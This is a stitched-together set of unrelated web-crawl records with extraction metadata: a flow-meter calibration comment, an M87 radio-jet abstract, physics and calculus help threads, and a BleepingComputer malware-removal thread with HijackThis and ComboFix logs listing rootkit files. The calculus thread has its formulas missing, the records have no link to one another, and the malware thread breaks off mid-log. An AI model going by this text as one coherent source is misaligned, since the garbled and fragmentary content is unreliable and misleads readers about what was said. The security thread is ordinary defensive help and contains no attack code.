Looking at Buck’s specifications for this model the flow ranges from 0.1 to 30 lpm with +/- 0.5% of reading accuracy. That is a huge range and extremely small error. I’m skeptical the Buck performs this well at the extreme low end of 300 ml per minute. Manufacturers often exaggerate their performance specifications. I think the cylinder method could marginally be improved with a glass apparatus but you'd probably need to buy this type of glassware rather than make your own. I'm not sure how much it would improve the timed cylinder method but glass is easier to read, typically has finer markings, and the volumes are often more reliable if made by a reputable brand. Looking at your data--and omitting the 39.78 time for tube 2—the DIY cylinder seems to be well within 1% precision—it’s very consistent. Here's how I graphed the results, with the one time I question circled in red. Is this a question? Click here to post it to the Questions page. I agree a glass apparatus would be better-- I worry about compressing or messing up the plastic. The problem is the price! A 1000ml Burette is used to calibrate the Mini-Buck, and its more than $200 with shipping! I did some tests with a$45, 50ml pyrex pipette-- the biggest I could buy in-town-- but the bubbles just travel too fast in that apparatus.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.31124988198280334, "perplexity": 2117.5625503230794}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-45/segments/1603107891428.74/warc/CC-MAIN-20201026145305-20201026175305-00044.warc.gz"}
http://aas.org/archives/BAAS/v26n4/aas185/abs/S10912.html
Results of $\lambda18\,cm$ VLBI Monitoring of the Radio Jet of Virgo~A Session 109 -- Extragalactic Radio Sources, Jets Display presentation, Thursday, 12, 1995, 9:20am - 6:30pm ## [109.12] Results of $\lambda18\,cm$ VLBI Monitoring of the Radio Jet of Virgo~A J.A.\ Biretta (STScI), W.\ Junor (UNM) We present cumulative results of global $\lambda18\,cm$ VLBI monitoring of the radio jet of Virgo~A (3C274, M87) between 1980 and 1992. The most recent VLBI images with 3 mas (0.2 pc) resolution and 3000:1 dynamic range show a wealth of complex structure in the jet, including spatial oscillations and limb-brightening. The brightest jet features show little or no proper motion, which is in sharp contrast to the kpc-scale jet where motions of up to 2.5$c$ are seen. The implications of the observed morphology and proper motions for models of jet collimation and stability are discussed. (See also Junor \& Biretta.)
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6452590823173523, "perplexity": 7106.707477172261}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-42/segments/1413507443451.12/warc/CC-MAIN-20141017005723-00306-ip-10-16-133-185.ec2.internal.warc.gz"}
http://aliquote.org/micro/2020-10-01-13-22-25/
# aliquote ## < a quantity that can be divided into another a whole number of time /> MOAR survey regression models. #rstats
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6898133754730225, "perplexity": 2820.728864274996}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618039375537.73/warc/CC-MAIN-20210420025739-20210420055739-00592.warc.gz"}
https://www.physicsforums.com/threads/fresnel-power-coefficients.434944/
# Fresnel power Coefficients 1. Oct 4, 2010 ### Gogsey Hi, I'm doing a question using the Fresnel power coefficients, not the Fresnel amplitude coefficients. We can use matlab for this, but we are given a fixed angle of incidence of 45 deg so its really just one calculation, as opposed to an earlier question where the angle varied between 0 and 90 deg. We are given the refractive indices. But what are these equations, lol. We're supposed to look them up but I can't find them. The earlier question talked about the Fresnel amplitude coefficients, and this current question tells us to use the Fresnel power coefficients so I assume they are different. Thanks a lot Liam 2. Oct 5, 2010 ### hikaru1221 I've never heard of Fresnel power coefficient, but I guess it's similar to reflection coefficient. Then if you can calculate the relation between amplitudes, since power ~ intensity ~ amplitude^2, you can calculate the coefficient, right? 3. Oct 5, 2010 ### Gogsey Hi Thanks, yeah all we had to do was square the Fresnel amplitude reflection coefficient to get the power reflection coefficient and use 1-R2 to get the Fresnel power transmission coefficient.
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9666847586631775, "perplexity": 1128.4269933854312}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-18/segments/1461860118321.95/warc/CC-MAIN-20160428161518-00177-ip-10-239-7-51.ec2.internal.warc.gz"}
http://mathhelpforum.com/calculus/204849-differentiation-help.html
# Math Help - differentiation help 1. ## differentiation help Let for . What is ? id the answer just 5/7? 2. ## Re: differentiation help Originally Posted by Tweety Let for . What is ? id the answer just 5/7? No. $y=\frac{5}{7x}=\frac{5}{7}x^{-1}$ Now you can just use the power rule $\frac{d}{dx}x^{\alpha} = \alpha x^{\alpha -1}$ In your case $\alpha =-1$
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 3, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9929507970809937, "perplexity": 6469.373471309516}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-35/segments/1440645353863.81/warc/CC-MAIN-20150827031553-00143-ip-10-171-96-226.ec2.internal.warc.gz"}
https://www.bleepingcomputer.com/forums/t/250396/system-security-version-452-gone-terribly-wrong/
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site. # System Security Version 4.52 Gone Terribly Wrong 9 replies to this topic ### #1 peterocks peterocks • Members • 8 posts • OFFLINE • • Local time:12:24 AM Posted 17 August 2009 - 06:55 PM Hello everyone. I have been having a lot of trouble with my computer lately. I am going moving back to college in about a week and a half and I would really like to get this issue resolved before I return to school. It all started with contracting System Security Verison 4.52 a couple weeks ago. Since then, traces of System Security have vanished, however many new issues have emerged. I've tried many things to fix the problem, to no avail. Here are the symptoms I'm experiencing: -Malwarebytes can't be opened and run. I click the shortcut and it refuses to open, even in safe mode. -Audio commercials play in the background of the computer without any apparent source. -While using Google, I cannot click on any of the links. If I do, a spam window opens that starts with "www.windowsclick.com...." and then turns into a random spam site. -Upon start-up of the computer, occasionally the computer crashes with the message "Driver IRQL Not Less or Equal" (the code at the bottom changes from time to time) -Upon start-up of the computer, I frequently receive an error message from ViewManager.exe -Zone Alarm wasn't able to install properly and cannot finish a complete scan (stops at 287 files read each time) -I have used numerous programs such as Spybot S&D, McAfee Security Suite, Spyware Doctor, Windows Defender and AVG separately so they don't interfere with one another. None have been able to solve the problem. -I am unable to use the Check Disk function in the C Drive, and also System Restore has been disabled. Here is a copy of the Hijack This Log as of today: Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 19:49:50, on 8/17/2009 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.16674) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\Intel\Wireless\Bin\EvtEng.exe C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe C:\WINDOWS\system32\ZoneLabs\vsmon.exe C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE C:\Program Files\Dell\NICCONFIGSVC\NICCONFIGSVC.exe C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe C:\Program Files\Intel\Wireless\Bin\ZcfgSvc.exe C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\Explorer.EXE C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe C:\Program Files\Apoint\Apoint.exe C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe C:\Program Files\Dell\Media Experience\PCMService.exe C:\Program Files\Real\RealPlayer\RealPlay.exe C:\WINDOWS\system32\dla\tfswctrl.exe C:\WINDOWS\system32\ctfmon.exe C:\Program Files\Canon\MyPrinter\BJMyPrt.exe C:\Program Files\iTunes\iTunesHelper.exe C:\PROGRA~1\Intel\Wireless\Bin\1XConfig.exe C:\Program Files\Messenger\msmsgs.exe C:\Program Files\DellSupport\DSAgnt.exe C:\WINDOWS\system32\svchost.exe C:\Program Files\Digital Line Detect\DLG.exe C:\Program Files\Apoint\Apntex.exe C:\Program Files\iPod\bin\iPodService.exe C:\Program Files\AIM6\aim6.exe C:\PROGRA~1\ZONELA~1\ZONEAL~1\MAILFR~1\mantispm.exe C:\Program Files\AIM6\aolsoftware.exe C:\Program Files\Java\jre1.6.0_02\bin\jucheck.exe C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Internet Explorer\Iexplore.exe C:\Program Files\Trend Micro\HijackThis2\HijackThis.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://baseball.fantasysports.yahoo.com/b1/258902 R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.dell4me.com/mywaybiz R3 - URLSearchHook: (no name) - {0BC6E3FA-78EF-4886-842C-5A1258C4455A} - (no file) O1 - Hosts: ::1 localhost O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file) O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - (no file) O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll O2 - BHO: (no name) - {A3BC75A2-1F87-4686-AA43-5347D756017C} - (no file) O3 - Toolbar: (no name) - {D3DEE18F-DB64-4BEB-9FF1-E1F0A5033E4A} - (no file) O3 - Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file) O3 - Toolbar: (no name) - {DE9C389F-3316-41A7-809B-AA305ED9D922} - (no file) O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe" O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint\Apoint.exe O4 - HKLM\..\Run: [IntelWireless] C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe /tf Intel PROSet/Wireless O4 - HKLM\..\Run: [ATIPTA] "C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe" O4 - HKLM\..\Run: [PCMService] "C:\Program Files\Dell\Media Experience\PCMService.exe" O4 - HKLM\..\Run: [DVDLauncher] "C:\Program Files\CyberLink\PowerDVD\DVDLauncher.exe" O4 - HKLM\..\Run: [RealTray] C:\Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER O4 - HKLM\..\Run: [ISUSScheduler] "C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start O4 - HKLM\..\Run: [dla] C:\WINDOWS\system32\dla\tfswctrl.exe O4 - HKLM\..\Run: [MSKDetectorExe] C:\Program Files\McAfee\SpamKiller\MSKDetct.exe /uninstall O4 - HKLM\..\Run: [dscactivate] "C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe" O4 - HKLM\..\Run: [CloneDVDElbyDelay] "C:\Program Files\Elaborate Bytes\CloneDVD\ElbyCheck.exe" /L ElbyDelay O4 - HKLM\..\Run: [CanonMyPrinter] C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon O4 - HKLM\..\Run: [AppleSyncNotifier] C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe" O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide O4 - HKLM\..\Run: [ISUSPM Startup] "C:\Program Files\Common Files\InstallShield\UpdateService\isuspm.exe" -startup O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe" O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background O4 - HKCU\..\Run: [DellSupport] "C:\Program Files\DellSupport\DSAgnt.exe" /startup O4 - Global Startup: Digital Line Detect.lnk = ? O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll O9 - Extra button: MUSICMATCH MX Web Player - {d81ca86b-ef63-42af-bee3-4502d9a03c2d} - http://wwws.musicmatch.com/mmz/openWebRadio.html (file missing) O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O16 - DPF: CabBuilder - http://ak.imgag.com/imgag/kiw/toolbar/down...llerControl.cab O16 - DPF: {1E54D648-B804-468d-BC78-4AFFED8E262F} (System Requirements Lab) - http://www.nvidia.com/content/DriverDownlo...sreqlab_nvd.cab O16 - DPF: {2BC66F54-93A8-11D3-BEB6-00105AA9B6AE} - O16 - DPF: {2E28242B-A689-11D4-80F2-0040266CBB8D} (KXHCM10 Control) - http://125.206.34.118/cgi-bin/kxhcm10.ocx O16 - DPF: {644E432F-49D3-41A1-8DD5-E099162EEEC5} - O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\ O20 - Winlogon Notify: khfEXnNG - khfEXnNG.dll (file missing) O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe O23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exe O23 - Service: EvtEng - Intel Corporation - C:\Program Files\Intel\Wireless\Bin\EvtEng.exe O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe O23 - Service: NICCONFIGSVC - Dell Inc. - C:\Program Files\Dell\NICCONFIGSVC\NICCONFIGSVC.exe O23 - Service: RegSrvc - Intel Corporation - C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe O23 - Service: Spectrum24 Event Monitor (S24EventMonitor) - Intel Corporation - C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe O23 - Service: Viewpoint Manager Service - Viewpoint Corporation - C:\Program Files\Viewpoint\Common\ViewpointService.exe O23 - Service: TrueVector Internet Monitor (vsmon) - Check Point Software Technologies LTD - C:\WINDOWS\system32\ZoneLabs\vsmon.exe O23 - Service: WLANKEEPER - Intel® Corporation - C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe -- End of file - 10882 bytes Any help is greatly appreciated. Thank you for your time ### #2 Buckeye_Sam Buckeye_Sam Malware Expert • Members • 17,382 posts • OFFLINE • • Gender:Male • Location:Pickerington, Ohio • Local time:11:24 PM Posted 18 August 2009 - 01:07 PM Hello! My name is Sam and I will be helping you. In order to see what's going on with your computer I'll ask for you to post various logs from the tools that we will use to resolve your issue. Please also share with me any information about how your computer is reacting and behaving each step of the way as we work through this process. Important! You should NOT use Combofix unless you have been instructed to do so by a Malware Removal Expert. It is intended by its creator to be used under the guidance and supervision of an Malware Removal Expert, not for private use. Using this tool incorrectly could lead to disastrous problems with your operating system such as preventing it from ever starting again. Make sure that you save ComboFix.exe to your Desktop • Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools • Double click on ComboFix.exe & follow the prompts. • As part of it's process, ComboFix will check to see if the Microsoft Windows Recovery Console is installed. With malware infections being as they are today, it's strongly recommended to have this pre-installed on your machine before doing any malware removal. It will allow you to boot up into a special recovery/repair mode that will allow us to more easily help you should your computer have a problem after an attempted removal of malware. • Follow the prompts to allow ComboFix to download and install the Microsoft Windows Recovery Console, and when prompted, agree to the End-User License Agreement to install the Microsoft Windows Recovery Console. **Please note: If the Microsoft Windows Recovery Console is already installed, ComboFix will continue it's malware removal procedures. Once the Microsoft Windows Recovery Console is installed using ComboFix, you should see the following message: Click on Yes, to continue scanning for malware. When finished, it shall produce a log for you. Please include the C:\ComboFix.txt in your next reply. If I have helped you in any way, please consider a donation to help me continue the fight against malware. Failing to respond back to the person that is giving up their own time to help you not only is insensitive and disrespectful, but it guarantees that you will never receive help from me again. Please thank your helpers and there will always be help here when you need it! ======================================================== ### #3 peterocks peterocks • Topic Starter • Members • 8 posts • OFFLINE • • Local time:12:24 AM Posted 18 August 2009 - 02:15 PM Thank you for your help. I am, however, having trouble getting Combofix to run on my computer. I have tried using it multiple times, even in safe mode, with no luck. I have also uninstalled all other relevant programs with the exception of Hijack This. When I try to double-click on the Combofix icon, there is the cursor with the hourglass symbol next to it for a few seconds, and then it goes back to the normal cursor symbol and nothing happens. ### #4 Buckeye_Sam Buckeye_Sam Malware Expert • Members • 17,382 posts • OFFLINE • • Gender:Male • Location:Pickerington, Ohio • Local time:11:24 PM Posted 19 August 2009 - 10:21 AM -------------------------------------------------------------------- Double click on Combo-Fix.exe & follow the prompts. • When finished, it will produce a report for you. • Please post the C:\ComboFix.txt so we can continue cleaning the system. If I have helped you in any way, please consider a donation to help me continue the fight against malware. Failing to respond back to the person that is giving up their own time to help you not only is insensitive and disrespectful, but it guarantees that you will never receive help from me again. Please thank your helpers and there will always be help here when you need it! ======================================================== ### #5 peterocks peterocks • Topic Starter • Members • 8 posts • OFFLINE • • Local time:12:24 AM Posted 19 August 2009 - 02:22 PM Thank you very much. I was able to load Combofix through your instructions. However, throughout the process, there were a few error messages: -Almost right after start-up of the program, there was an error message that stated "File or directory C:\$Mft is corrupt or unreadable" -Before Combofix could start scanning, there was an error message that stated "Detected presence of rootkit activity and needs to reboot" the following were given: C:\WINDOWS\system32\drivers\hjgruimihroqkm.sys C:\WINDOWS\system32\hjgruinbaswvff.dll C:\WINDOWS\system32\hjgruinhqyhnplt.dat C:\WINDOWS\system32\hjgruikeknumho.dll C:\WINDOWS\system32\hjgruihgddokhc.dat C:\WINDOWS\system32\drivers\UACyppppnvyixowrqilq.sys C:\WINDOWS\system32\UACgwsyodpmxcpigkeox.dll C:\WINDOWS\system32\UACepluoedkyjupvvwvn.dat C:\WINDOWS\system32\UACijbjuovfjtlccqlwr.dll C:\WINDOWS\system32\UACquharjtmpeijgpvu.db C:\WINDOWS\system32\UACwflcallyfcaghsrnp.dll C:\WINDOWS\system32\UACscwnuamgbiqqontps.dll C:\WINDOWS\system32\UACenmxynsuydwnojfmv.dll -After the reboot and during the Combofix scan, the following error messages appeared: "File or directory C:\$Mft is corrupt or unreadable" Title "pev.cfxxe" "File or directory C:\$Mft is corrupt or unreadable" Title "PEV.exe" "File or directory C:\$Mft is corrupt or unreadable" Title "CF1194.exe" Combofix rebooted the computer after the scan and was able to complete Check Disk (The first time it has been able to do so since infection) Upon reboot, the following log was given: ComboFix 09-08-18.04 - Peterson 08/19/2009 13:52.1.1 - NTFSx86 Microsoft Windows XP Home Edition 5.1.2600.2.1252.1.1033.18.1023.711 [GMT -4:00] Running from: c:\documents and settings\Peterson\Desktop\Combo-Fix.exe * Created a new restore point . ((((((((((((((((((((((((((((((((((((((( Other Deletions ))))))))))))))))))))))))))))))))))))))))))))))))) . c:\windows\Installer\74ba0f.msi c:\windows\run.log c:\windows\system32\AcJRCcdd.ini c:\windows\system32\AcJRCcdd.ini2 c:\windows\system32\bemewvci.ini c:\windows\system32\drivers\hjgruimihroqkm.sys c:\windows\system32\drivers\UACyppppnvyixowrqilq.sys c:\windows\system32\fptxmojj.ini c:\windows\system32\gyvagfnk.ini c:\windows\system32\hjgruihgddokhc.dat c:\windows\system32\hjgruihqyhnplt.dat c:\windows\system32\hjgruikeknvmho.dll c:\windows\system32\hjgruinbaswvff.dll c:\windows\system32\hmhausqd.ini c:\windows\system32\pbbwsxao.ini c:\windows\system32\rtmxixfm.ini c:\windows\system32\tmp.reg c:\windows\system32\UACenmxynsuydwnojfmw.dll c:\windows\system32\UACepluoedkyjupvvwvn.dat c:\windows\system32\UACgwsyodpmxcpigkeox.dll c:\windows\system32\UACijbjuovfjtlccqlwr.dll c:\windows\system32\uacinit.dll c:\windows\system32\UACqvharjtmpeijgqpvu.db c:\windows\system32\UACscwnuamgbiqqontps.dll c:\windows\system32\uactmp.db c:\windows\system32\UACwflcallyfcaghsrnp.dll Infected copy of c:\windows\system32\mspmsnsv.dll was found and disinfected Restored copy from - c:\windows\system32\dllcache\mspmsnsv.dll . ((((((((((((((((((((((((((((((((((((((( Drivers/Services ))))))))))))))))))))))))))))))))))))))))))))))))) . -------\Service_hjgruiravowvei -------\Legacy_hjgruiravowvei -------\Service_UACd.sys -------\Legacy_UACd.sys ((((((((((((((((((((((((( Files Created from 2009-07-19 to 2009-08-19 ))))))))))))))))))))))))))))))) . 2009-08-19 18:36 . 2009-08-19 18:39 -------- d-----w- c:\windows\LastGood 2009-08-19 18:02 . 2009-08-19 18:02 -------- d-sh--w- C:\found.000 2009-08-18 14:45 . 2009-08-18 14:45 -------- d-----w- c:\program files\SonicWallES 2009-08-17 19:26 . 2009-08-17 19:27 4212 ---ha-w- c:\windows\system32\zllictbl.dat 2009-08-16 19:33 . 2009-08-16 19:33 64 ----a-w- c:\documents and settings\Peterson\Application Data\Mozilla\Firefox\Profiles\6ehew45v.default\extensions\[email protected] 2009-08-12 19:34 . 2009-08-19 17:29 -------- d-----w- c:\documents and settings\Peterson\Application Data\vlc 2009-08-12 18:16 . 2009-08-12 18:16 -------- d-----w- c:\program files\Mozilla ActiveX Control v1.7.12 2009-08-12 18:14 . 2009-08-17 18:25 -------- d-----w- c:\program files\Graboid 2009-08-09 20:15 . 2009-08-09 20:15 70656 ----a-w- c:\windows\system32\drivers\iymsbpctccdxbvrn.sys 2009-08-04 21:15 . 2009-08-05 03:31 -------- d-----w- c:\program files\SpyZooka 2009-08-04 20:29 . 2009-08-14 09:49 -------- d-----w- c:\program files\spmfby 2009-07-24 19:28 . 2009-07-24 19:28 -------- d-----w- c:\documents and settings\Peterson\Local Settings\Application Data\Mozilla 2009-07-24 02:12 . 2009-07-24 02:12 -------- d-----w- c:\program files\VideoLAN . (((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))) . 2009-08-19 01:30 . 2009-04-12 01:11 -------- d-----w- c:\program files\PeerGuardian2 2009-08-18 18:56 . 2006-07-31 21:04 -------- d-----w- c:\program files\Windows Defender 2009-08-17 23:49 . 2009-07-18 15:58 -------- d-----w- c:\program files\Trend Micro 2009-08-17 18:34 . 2007-07-09 21:19 -------- d-----w- c:\program files\Spyware Doctor 2009-08-17 18:33 . 2006-11-27 02:42 -------- d---a-w- c:\docume~1\ALLUSE~1\APPLIC~1\TEMP 2009-08-17 18:32 . 2005-12-19 18:41 -------- d-----w- c:\docume~1\ALLUSE~1\APPLIC~1\McAfee 2009-08-17 18:32 . 2005-12-19 18:41 -------- d-----w- c:\program files\McAfee 2009-08-17 18:25 . 2009-03-08 18:54 -------- d-----w- c:\program files\Spybot - Search & Destroy 2009-08-17 18:24 . 2009-03-08 18:54 -------- dc----w- c:\docume~1\ALLUSE~1\APPLIC~1\Spybot - Search & Destroy 2009-08-17 18:15 . 2007-09-02 04:02 -------- d-----w- c:\program files\uTorrent 2009-08-17 18:15 . 2006-07-31 17:32 -------- d-----w- c:\documents and settings\Peterson\Application Data\uTorrent 2009-08-16 22:49 . 2006-06-18 16:57 3766 --sha-w- c:\windows\system32\KGyGaAvL.sys 2009-08-16 22:49 . 2006-06-18 16:57 56 --sh--r- c:\windows\system32\4FF8E3934A.sys 2009-08-16 19:33 . 2008-09-27 14:45 -------- d-----w- c:\program files\Common Files\DVDVideoSoft 2009-08-11 11:54 . 2009-07-16 22:08 -------- d-----w- c:\documents and settings\LocalService\Application Data\SACore 2009-07-18 01:01 . 2009-07-18 01:01 -------- d-----w- c:\program files\Alwil Software 2009-07-18 00:48 . 2009-07-18 00:48 -------- d-----w- c:\windows\system32\config\systemprofile\Application Data\SACore 2009-07-16 22:22 . 2009-07-05 00:59 -------- d-----w- c:\program files\Image-Line 2009-07-16 22:14 . 2005-12-26 16:35 -------- d-----w- c:\program files\Microsoft AntiSpyware 2009-07-16 22:13 . 2009-01-07 04:51 -------- d-----w- c:\documents and settings\Peterson\Application Data\Move Networks 